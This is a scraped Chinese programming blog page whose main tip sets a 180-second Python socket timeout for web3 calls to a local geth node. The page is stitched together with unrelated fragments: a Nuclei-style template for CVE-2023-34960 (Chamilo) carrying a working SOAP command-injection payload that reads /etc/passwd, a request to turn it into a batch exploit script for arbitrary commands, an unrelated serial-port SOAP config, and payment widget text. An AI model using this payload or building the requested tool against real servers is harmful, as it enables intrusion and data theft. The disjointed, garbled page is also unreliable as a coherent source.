python的 http/soap设置超时时间

本文介绍了一种解决通过web3调用本地light模式的geth RPC端口8584时出现timeout的方法,即通过设置http超时时间为180秒来提高响应速度。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

通过web3调用本地light模式的geth的RCP端口8584获取state时相应会比较慢,会出现timeout的问题,通过以下方法解决:

# 设置http超时时间为180s
import socket
timeout = 180
socket.setdefaulttimeout(timeout)
id: CVE-2023-34960 info: name: Chamilo Command Injection author: DhiyaneshDK severity: critical description: | A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name. impact: | Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the command injection vulnerability in Chamilo LMS. reference: - https://sploitus.com/exploit?id=FD666992-20E1-5D83-BA13-67ED38E1B83D - https://github.com/Aituglo/CVE-2023-34960/blob/master/poc.py - http://chamilo.com - http://packetstormsecurity.com/files/174314/Chamilo-1.11.18-Command-Injection.html - https://support.chamilo.org/projects/1/wiki/Security_issues#Issue-112-2023-04-20-Critical-impact-High-risk-Remote-Code-Execution classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-34960 cwe-id: CWE-77 epss-score: 0.93314 epss-percentile: 0.99067 cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: chamilo product: chamilo shodan-query: - http.component:"Chamilo" - http.component:"chamilo" - cpe:"cpe:2.3:a:chamilo:chamilo" tags: cve,cve2023,packetstorm,chamilo http: - raw: - | POST /main/webservices/additional_webservices.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml; charset=utf-8 <?xml version="1.0" encoding="UTF-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{{RootURL}}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">`{}`.pptx'|" |cat /etc/passwd||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope> matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" part: body - type: word part: header words: - text/xml - type: status status: - 200 # digest: 4a0a00473045022034e60ad33e2160ec78cbef2c6c410b14dabd6c3ca8518c21571e310453a24e25022100927e4973b55f38f2cc8ceca640925b7066d4325032b04fb0eca080984080a1d0:922c64590222798bb761d5b6d8e72950根据poc实现python的exp,并且读取当前目录下的文件 批量执行 ,例如,python CVE-2023-34960.py -f .8.txt -c "需要执行的命令" 并将执行成功的结果输出 -o 9.txt 添加选项-o 8.txt的文本文件
03-27
<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <SOAP-ENC:Array xmlns:a1="http://schemas.microsoft.com/clr/nsassem/Tsr2/Tsr2%2C%20Version%3D2.1.3.9%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3Dnull" SOAP-ENC:arrayType="a1:ModPCBY+structComSetting[10]"> <item> <Baurate>9600</Baurate> <Parity id="ref-3">None</Parity> <Databit>8</Databit> <Stopbit>1</Stopbit> <Term>13</Term> <Timeout>1000</Timeout> <Wait>1200</Wait> <Head>0</Head> </item> <item> <Baurate>9600</Baurate> <Parity id="ref-4">Even</Parity> <Databit>7</Databit> <Stopbit>2</Stopbit> <Term>3</Term> <Timeout>1000</Timeout> <Wait>0</Wait> <Head>2</Head> </item> <item> <Baurate>9600</Baurate> <Parity id="ref-5">None</Parity> <Databit>8</Databit> <Stopbit>1</Stopbit> <Term>13</Term> <Timeout>1000</Timeout> <Wait>0</Wait> <Head>48</Head> </item> <item> <Baurate>9600</Baurate> <Parity id="ref-6">None</Parity> <Databit>8</Databit> <Stopbit>1</Stopbit> <Term>13</Term> <Timeout>2000</Timeout> <Wait>0</Wait> <Head>0</Head> </item> <item> <Baurate>38400</Baurate> <Parity id="ref-7">None</Parity> <Databit>8</Databit> <Stopbit>1</Stopbit> <Term>13</Term> <Timeout>3000</Timeout> <Wait>0</Wait> <Head>0</Head> </item> <item> <Baurate>9600</Baurate> <Parity id="ref-8">None</Parity> <Databit>8</Databit> <Stopbit>1</Stopbit> <Term>13</Term> <Timeout>1000</Timeout> <Wait>0</Wait> <Head>0</Head> </item> <item> <Baurate>9600</Baurate> <Parity id="ref-9">None</Parity> <Databit>8</Databit> <Stopbit>1</Stopbit> <Term>13</Term> <Timeout>1000</Timeout> <Wait>0</Wait> <Head>0</Head> </item> <item> <Baurate>9600</Baurate> <Parity id="ref-10">None</Parity> <Databit>8</Databit> <Stopbit>1</Stopbit> <Term>13</Term> <Timeout>1000</Timeout> <Wait>0</Wait> <Head>0</Head> </item> <item> <Baurate>9600</Baurate> <Parity id="ref-11">None</Parity> <Databit>8</Databit> <Stopbit>1</Stopbit> <Term>13</Term> <Timeout>1000</Timeout> <Wait>0</Wait> <Head>0</Head> </item> <item> <Baurate>0</Baurate> <Parity xsi:null="1"/> <Databit>0</Databit> <Stopbit>0</Stopbit> <Term>0</Term> <Timeout>0</Timeout> <Wait>0</Wait> <Head>0</Head> </item> </SOAP-ENC:Array> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
最新发布
07-23
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值